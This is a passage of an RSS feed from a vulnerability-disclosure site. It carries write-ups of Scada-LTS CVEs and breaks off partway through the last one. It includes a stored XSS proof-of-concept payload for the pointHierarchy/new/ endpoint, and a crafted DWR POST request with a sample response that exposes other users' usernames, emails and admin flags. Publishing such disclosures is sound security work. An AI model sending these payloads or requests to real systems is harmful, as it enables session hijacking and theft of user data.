&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9137.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9137.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 19 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9138</title>
        <link>https://www.cvehunters.com/p/cve-2025-9138/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9138/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9138-cross-site-scripting-xss-stored-endpoint-pointhierarchynew-via-path-parameter&amp;#34;&amp;gt;CVE-2025-9138: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;pointHierarchy/new/&amp;lt;/code&amp;gt; via path parameter
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9138&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9138&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;pointHierarchy/new/&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts via path parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;pointHierarchy/new/&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9138-cross-site-scripting-xss-stored-endpoint-pointhierarchynew-via-path-parameter&amp;#34;&amp;gt;CVE-2025-9138: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;pointHierarchy/new/&amp;lt;/code&amp;gt; via path parameter
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9138&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9138&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;pointHierarchy/new/&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts via path parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;pointHierarchy/new/&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs via path parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(10)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9138/image.png&amp;#34;
	width=&amp;#34;667&amp;#34;
	height=&amp;#34;315&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9138/image_hu_a00d5e9a8a813e04.png 480w, /p/cve-2025-9138/image_hu_197f1e93b2a183a9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;211&amp;#34;
		data-flex-basis=&amp;#34;508px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9138.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9138.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 19 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9139</title>
        <link>https://www.cvehunters.com/p/cve-2025-9139/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9139/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9139-sensitive-user-information-disclosure-via-watchlistdwrinitdwr-endpoint&amp;#34;&amp;gt;CVE-2025-9139: Sensitive User Information Disclosure via &amp;lt;code&amp;gt;WatchListDwr.init.dwr&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9139&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9139&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A vulnerability was identified in the &amp;lt;code&amp;gt;WatchListDwr.init.dwr&amp;lt;/code&amp;gt; endpoint of SCADA-LTS that allows any authenticated user, even with minimal permissions, to access sensitive user information including usernames, emails, phone numbers, and admin status. This flaw constitutes an &amp;lt;b&amp;gt;Information Disclosure&amp;lt;/b&amp;gt; issue and could be used to facilitate further attacks such as phishing, privilege escalation, or social engineering.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;POST /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Authentication Required:&amp;lt;/b&amp;gt; Yes (low-privileged user)&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Affected Parameter:&amp;lt;/b&amp;gt; N/A (static DWR call)&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Impact Type:&amp;lt;/b&amp;gt; Information Disclosure&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9139-sensitive-user-information-disclosure-via-watchlistdwrinitdwr-endpoint&amp;#34;&amp;gt;CVE-2025-9139: Sensitive User Information Disclosure via &amp;lt;code&amp;gt;WatchListDwr.init.dwr&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9139&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9139&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A vulnerability was identified in the &amp;lt;code&amp;gt;WatchListDwr.init.dwr&amp;lt;/code&amp;gt; endpoint of SCADA-LTS that allows any authenticated user, even with minimal permissions, to access sensitive user information including usernames, emails, phone numbers, and admin status. This flaw constitutes an &amp;lt;b&amp;gt;Information Disclosure&amp;lt;/b&amp;gt; issue and could be used to facilitate further attacks such as phishing, privilege escalation, or social engineering.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;POST /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Authentication Required:&amp;lt;/b&amp;gt; Yes (low-privileged user)&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Affected Parameter:&amp;lt;/b&amp;gt; N/A (static DWR call)&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Impact Type:&amp;lt;/b&amp;gt; Information Disclosure&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;By issuing a crafted POST request to the vulnerable endpoint, a low-privileged user is able to retrieve detailed information of all users in the system. The backend responds with a full JavaScript object containing data such as usernames, emails, admin flags, and phone numbers.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;sample-request&amp;#34;&amp;gt;Sample Request:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;POST /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: kubernetes.docker.internal:8080
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: text/plain
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;callCount=1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;page=/Scada-LTS/watch_list.shtm
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;httpSessionId=
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;scriptSessionId=XYZ123456789
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;c0-scriptName=WatchListDwr
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;c0-methodName=init
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;c0-id=0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;batchId=1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;sample-response-snippet&amp;#34;&amp;gt;Sample Response Snippet::
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;javascript
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s7.admin=true;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s7.email=&amp;amp;#34;admin@yourMangoDomain.com&amp;amp;#34;;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s7.username=&amp;amp;#34;admin&amp;amp;#34;;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s8.admin=false;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s8.email=&amp;amp;#34;anonymous@mail.com&amp;amp;#34;;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s8.username=&amp;amp;#34;anonymous&amp;amp;#34;;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s11.admin=false;
